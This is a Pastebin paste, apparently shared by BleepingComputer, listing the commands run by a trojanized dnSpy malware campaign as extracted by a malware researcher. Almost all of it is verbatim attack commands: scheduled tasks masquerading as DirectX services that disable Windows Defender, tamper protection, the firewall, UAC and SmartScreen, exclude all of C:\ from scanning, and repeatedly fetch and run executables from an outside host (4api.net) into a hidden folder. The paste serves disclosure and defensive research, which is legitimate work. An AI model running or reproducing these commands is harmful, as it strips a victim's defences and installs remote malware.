API tools faq
paste
BleepingComputer

Untitled

BleepingComputer
Jan 8th, 2022 (edited)
1,348
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 23.82 KB | None | 0 0
raw download clone embed print report
  1. Commands executed by Trojanized dnSpy campaign. Extracted by https://twitter.com/malwrhunterteam
  2.  
  3. 1.
  4. @"schtasks /create /f /sc minute /mo 20 /rl highest /tn ""Microsoft\Windows\DirectX\Force Sc"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan $true -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 20 /rl highest /tn ""Microsoft\Windows\DirectX\Force Re"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force;',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 20 /rl highest /tn ""Microsoft\Windows\DirectX\Force 01"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 20 /rl highest /tn ""Microsoft\Windows\DirectX\Force 02"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -DisableBehaviorMonitoring $true -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 20 /rl highest /tn ""Microsoft\Windows\DirectX\Force 03"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -DisableBlockAtFirstSeen $true -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 20 /rl highest /tn ""Microsoft\Windows\DirectX\Force 04"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -DisableIOAVProtection $true -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 20 /rl highest /tn ""Microsoft\Windows\DirectX\Force 05"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -DisablePrivacyMode $true -ErrorAction Ignore',0)(Window.Close)"""
  5.  
  6. 2.
  7.  
  8. @"schtasks /create /f /sc minute /mo 21 /rl highest /tn ""Microsoft\Windows\DirectX\Force 06"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 21 /rl highest /tn ""Microsoft\Windows\DirectX\Force 07"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -DisableArchiveScanning $true -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 21 /rl highest /tn ""Microsoft\Windows\DirectX\Force 08"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 21 /rl highest /tn ""Microsoft\Windows\DirectX\Force 09"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -DisableScriptScanning $true -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 21 /rl highest /tn ""Microsoft\Windows\DirectX\Force 10"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -SubmitSamplesConsent 2 -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 21 /rl highest /tn ""Microsoft\Windows\DirectX\Force 11"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -MAPSReporting 0 -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 21 /rl highest /tn ""Microsoft\Windows\DirectX\Force 12"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -HighThreatDefaultAction 6 -Force -ErrorAction Ignore',0)(Window.Close)"""
  9.  
  10. 3.
  11.  
  12. @"schtasks /create /f /sc minute /mo 22 /rl highest /tn ""Microsoft\Windows\DirectX\Force 13"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -ModerateThreatDefaultAction 6 -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 22 /rl highest /tn ""Microsoft\Windows\DirectX\Force 14"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -LowThreatDefaultAction 6 -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 22 /rl highest /tn ""Microsoft\Windows\DirectX\Force 15"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -SevereThreatDefaultAction 6 -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 22 /rl highest /tn ""Microsoft\Windows\DirectX\Force 16"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Add-MpPreference -ExclusionExtension .exe -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 22 /rl highest /tn ""Microsoft\Windows\DirectX\Force 17"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Add-MpPreference -ExclusionExtension exe -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 22 /rl highest /tn ""Microsoft\Windows\DirectX\Force 18"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Add-MpPreference -ExclusionProcess cmd.exe -Force',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 22 /rl highest /tn ""Microsoft\Windows\DirectX\Force 19"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Add-MpPreference -ExclusionProcess powershell.exe -Force',0)(Window.Close)"""
  13.  
  14. 4.
  15.  
  16. @"schtasks /create /f /sc minute /mo 23 /rl highest /tn ""Microsoft\Windows\DirectX\Force 20"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Add-MpPreference -ExclusionProcess mshta.exe -Force',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 23 /rl highest /tn ""Microsoft\Windows\DirectX\Force 21"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Add-MpPreference -ExclusionProcess *.exe -Force',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 23 /rl highest /tn ""Microsoft\Windows\DirectX\Force 22"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Add-MpPreference -ExclusionPath C:\* -Force',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 23 /rl highest /tn ""Microsoft\Windows\DirectX\Services 01"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add ''HKLM\SOFTWARE\Microsoft\Windows Defender\Features'' /v TamperProtection /t REG_DWORD /d 0 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 23 /rl highest /tn ""Microsoft\Windows\DirectX\Services 02"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add ''HKLM\Software\Policies\Microsoft\Windows Defender'' /v DisableAntiSpyware /t REG_DWORD /d 1 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 23 /rl highest /tn ""Microsoft\Windows\DirectX\Services 03"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add ''HKLM\Software\Policies\Microsoft\Windows Defender'' /v DisableAntiVirus /t REG_DWORD /d 1 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 23 /rl highest /tn ""Microsoft\Windows\DirectX\Services 04"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add ''HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine'' /v MpEnablePus /t REG_DWORD /d 0 /f',0)(Window.Close)"""
  17.  
  18. 5.
  19.  
  20.  
  21. @"schtasks /create /f /sc minute /mo 24 /rl highest /tn ""Microsoft\Windows\DirectX\Services 05"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add ''HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection'' /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 24 /rl highest /tn ""Microsoft\Windows\DirectX\Services 06"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add ''HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection'' /v DisableIOAVProtection /t REG_DWORD /d 1 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 24 /rl highest /tn ""Microsoft\Windows\DirectX\Services 07"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add ''HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection'' /v DisableOnAccessProtection /t REG_DWORD /d 1 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 24 /rl highest /tn ""Microsoft\Windows\DirectX\Services 08"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add ''HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection'' /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 24 /rl highest /tn ""Microsoft\Windows\DirectX\Services 09"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add ''HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection'' /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 24 /rl highest /tn ""Microsoft\Windows\DirectX\Services 10"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add ''HKLM\Software\Policies\Microsoft\Windows Defender\Reporting'' /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 24 /rl highest /tn ""Microsoft\Windows\DirectX\Services 11"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add ''HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet'' /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f',0)(Window.Close)"""
  22.  
  23.  
  24. 6.
  25.  
  26. @"schtasks /create /f /sc minute /mo 25 /rl highest /tn ""Microsoft\Windows\DirectX\Services 12"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add ''HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet'' /v SpynetReporting /t REG_DWORD /d 0 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 25 /rl highest /tn ""Microsoft\Windows\DirectX\Services 13"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add ''HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet'' /v SubmitSamplesConsent /t REG_DWORD /d 0 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 25 /rl highest /tn ""Microsoft\Windows\DirectX\Services 14"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 0 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 25 /rl highest /tn ""Microsoft\Windows\DirectX\Services 15"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger /v Start /t REG_DWORD /d 0 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 25 /rl highest /tn ""Microsoft\Windows\DirectX\Services 16"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v ''Windows Defender'' /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 25 /rl highest /tn ""Microsoft\Windows\DirectX\Services 17"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ''Windows Defender'' /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 25 /rl highest /tn ""Microsoft\Windows\DirectX\Services 18"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v WindowsDefender /f',0)(Window.Close)"""
  27.  
  28.  
  29. 7.
  30.  
  31. @"schtasks /create /f /sc minute /mo 26 /rl highest /tn ""Microsoft\Windows\DirectX\Services 19"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg delete HKCR\*\shellex\ContextMenuHandlers\EPP /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 26 /rl highest /tn ""Microsoft\Windows\DirectX\Services 20"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg delete HKCR\Directory\shellex\ContextMenuHandlers\EPP /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 26 /rl highest /tn ""Microsoft\Windows\DirectX\Services 21"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg delete HKCR\Drive\shellex\ContextMenuHandlers\EPP /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 26 /rl highest /tn ""Microsoft\Windows\DirectX\Services 22"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add HKLM\System\CurrentControlSet\Services\WdBoot /v Start /t REG_DWORD /d 4 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 26 /rl highest /tn ""Microsoft\Windows\DirectX\Services 23"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add HKLM\System\CurrentControlSet\Services\WdFilter /v Start /t REG_DWORD /d 4 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 26 /rl highest /tn ""Microsoft\Windows\DirectX\Services 24"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add HKLM\System\CurrentControlSet\Services\WdNisDrv /v Start /t REG_DWORD /d 4 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 26 /rl highest /tn ""Microsoft\Windows\DirectX\Services 25"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add HKLM\System\CurrentControlSet\Services\WdNisSvc /v Start /t REG_DWORD /d 4 /f',0)(Window.Close)"""
  32.  
  33. 8.
  34.  
  35. @"schtasks /create /f /sc minute /mo 27 /rl highest /tn ""Microsoft\Windows\DirectX\Services 26"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add HKLM\System\CurrentControlSet\Services\WinDefend /v Start /t REG_DWORD /d 4 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 27 /rl highest /tn ""Microsoft\Windows\DirectX\Services 27"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add HKLM\System\CurrentControlSet\Services\SecurityHealthService /v Start /t REG_DWORD /d 4 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 27 /rl highest /tn ""Microsoft\Windows\DirectX\Services 28"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add HKLM\System\ControlSet001\Services\WdBoot /v Start /t REG_DWORD /d 4 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 27 /rl highest /tn ""Microsoft\Windows\DirectX\Services 29"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add HKLM\System\ControlSet001\Services\WdFilter /v Start /t REG_DWORD /d 4 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 27 /rl highest /tn ""Microsoft\Windows\DirectX\Services 30"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add HKLM\System\ControlSet001\Services\WdNisDrv /v Start /t REG_DWORD /d 4 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 27 /rl highest /tn ""Microsoft\Windows\DirectX\Services 31"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add HKLM\System\ControlSet001\Services\WdNisSvc /v Start /t REG_DWORD /d 4 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 27 /rl highest /tn ""Microsoft\Windows\DirectX\Services 32"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add HKLM\System\ControlSet001\Services\WinDefend /v Start /t REG_DWORD /d 4 /f',0)(Window.Close)"""
  36.  
  37. 9.
  38.  
  39. @"schtasks /create /f /sc minute /mo 29 /rl highest /tn ""Microsoft\Windows\DirectX\Services 33"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add ''HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection'' /v DpaDisabled /t REG_DWORD /d 1 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 29 /rl highest /tn ""Microsoft\Windows\DirectX\Services 34"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('reg add ''HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer'' /v SmartScreenEnabled /t REG_SZ /d Off /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 29 /rl highest /tn ""Microsoft\Windows\DirectX\Services 35"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('reg add ''HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet'' /v DontReportInfectionInformation /t REG_DWORD /d 1 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 29 /rl highest /tn ""Microsoft\Windows\DirectX\Services 36"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('reg delete HKLM\SYSTEM\CurrentControlSet\Services\Sense /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 29 /rl highest /tn ""Microsoft\Windows\DirectX\Services 37"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontReportInfectionInformatio /t REG_DWORD /d 1 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 29 /rl highest /tn ""Microsoft\Windows\DirectX\Services 38"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 29 /rl highest /tn ""Microsoft\Windows\DirectX\Services 39"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f',0)(Window.Close)"""
  40.  
  41. 10.
  42.  
  43. @"schtasks /create /f /sc minute /mo 30 /rl highest /tn ""Microsoft\Windows\DirectX\Services 40"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SecurityHealth /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 30 /rl highest /tn ""Microsoft\Windows\DirectX\Services 41"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance /v Enabled /t REG_DWORD /d 0 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 30 /rl highest /tn ""Microsoft\Windows\DirectX\Services 42"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('reg delete HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService /f',0)(Window.Close)"""
  44.  
  45. 11.
  46.  
  47. @"schtasks /create /f /sc minute /mo 31 /rl highest /tn ""Microsoft\Windows\DirectX\Services FW"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c netsh advfirewall set allprofiles state off',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 31 /rl highest /tn ""Microsoft\Windows\DirectX\Services UAC"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 31 /rl highest /tn ""Microsoft\Windows\DirectX\Services CURL"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c bitsadmin /transfer CURL http://4api.net/curl.exe %windir%\system32\curl.exe',0)(Window.Close)"" & schtasks /create /f /sc ONLOGON /rl highest /tn ""Microsoft\Windows\DirectX\Services CCore"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c timeout 150 & curl http://4api.net/c.exe -o C:\Trash\c.exe & C:\Trash\c.exe',0)(Window.Close)"" & schtasks /create /f /sc ONLOGON /rl highest /tn ""Microsoft\Windows\DirectX\Services BCore"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c timeout 300 & bitsadmin /transfer BCore http://4api.net/c.exe C:\Trash\c.exe & C:\Trash\c.exe',0)(Window.Close)"""
  48.  
  49. 12.
  50.  
  51. @"schtasks /create /f /sc minute /mo 300 /rl highest /tn ""Microsoft\Windows\DirectX\Services CCore"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c curl http://4api.net/c.exe -o C:\Trash\c.exe & C:\Trash\c.exe',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 600 /rl highest /tn ""Microsoft\Windows\DirectX\Services BCore"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c bitsadmin /transfer BCore http://4api.net/c.exe C:\Trash\c.exe & C:\Trash\c.exe',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 300 /rl highest /tn ""Microsoft\Windows\DirectX\Services CCK"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c curl http://4api.net/ck.exe -o C:\Trash\ck.exe & C:\Trash\ck.exe',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 600 /rl highest /tn ""Microsoft\Windows\DirectX\Services BCK"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c bitsadmin /transfer BX http://4api.net/ck.exe C:\Trash\ck.exe & C:\Trash\ck.exe',0)(Window.Close)"""
  52.  
  53. 13.
  54.  
  55. @"schtasks /create /f /sc minute /mo 300 /rl highest /tn ""Microsoft\Windows\DirectX\Services CBTC"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c curl http://4api.net/cbot.exe -o C:\Trash\cbot.exe & C:\Trash\cbot.exe',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 600 /rl highest /tn ""Microsoft\Windows\DirectX\Services BBTC"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c bitsadmin /transfer BX http://4api.net/cbot.exe C:\Trash\cbot.exe & C:\Trash\cbot.exe',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 300 /rl highest /tn ""Microsoft\Windows\DirectX\Services CBot"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c curl http://4api.net/cbo.exe -o C:\Trash\cbo.exe & C:\Trash\cbo.exe',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 600 /rl highest /tn ""Microsoft\Windows\DirectX\Services BBot"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c bitsadmin /transfer BX http://4api.net/cbo.exe C:\Trash\cbo.exe & C:\Trash\cbo.exe',0)(Window.Close)"""
  56.  
  57. 14.
  58.  
  59. @"schtasks /create /f /sc minute /mo 300 /tn ""Microsoft\Windows\DirectX\Services MN"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c curl http://4api.net/m.exe -o C:\Trash\m.exe & C:\Trash\m.exe',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 600 /tn ""Microsoft\Windows\DirectX\Services MN"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c bitsadmin /transfer BX http://4api.net/m.exe C:\Trash\m.exe & C:\Trash\m.exe',0)(Window.Close)"""
  60.  
  61. 15.
  62.  
  63. @"schtasks /create /f /sc minute /mo 300 /rl highest /tn ""Microsoft\Windows\DirectX\Services CAV"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c curl http://4api.net/d.exe -o C:\Trash\d.exe & C:\Trash\d.exe -d',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 600 /rl highest /tn ""Microsoft\Windows\DirectX\Services BAV"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c bitsadmin /transfer BX http://4api.net/d.exe C:\Trash\d.exe & C:\Trash\d.exe -d',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 20 /rl highest /tn ""Microsoft\Windows\DirectX\Services Dir"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c mkdir c:\Trash & attrib +h C:\Trash & attrib +h C:\Trash\*.* & exit',0)(Window.Close)"""
  64.  
  65. 16.
  66.  
  67. @"schtasks /create /f /sc minute /mo 300 /rl highest /tn ""Microsoft\Windows\DirectX\Services CNJ"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c curl http://4api.net/nnj.exe -o C:\Trash\nnj.exe & C:\Trash\nnj.exe',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 600 /rl highest /tn ""Microsoft\Windows\DirectX\Services BNJ"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c bitsadmin /transfer BX http://4api.net/nnj.exe C:\Trash\nnj.exe & C:\Trash\nnj.exe',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 300 /rl highest /tn ""Microsoft\Windows\DirectX\Services CQS"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c curl http://4api.net/qs.exe -o C:\Trash\qs.exe & C:\Trash\qs.exe',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 600 /rl highest /tn ""Microsoft\Windows\DirectX\Services BQS"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c bitsadmin /transfer BX http://4api.net/qs.exe C:\Trash\qs.exe & C:\Trash\qs.exe',0)(Window.Close)"""
  68.  
  69. 17.
  70.  
  71. @"Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0"
  72.  
  73. 18.
  74.  
  75. @"Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name PromptOnSecureDesktop -Value 0"
  76.  
  77.  
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!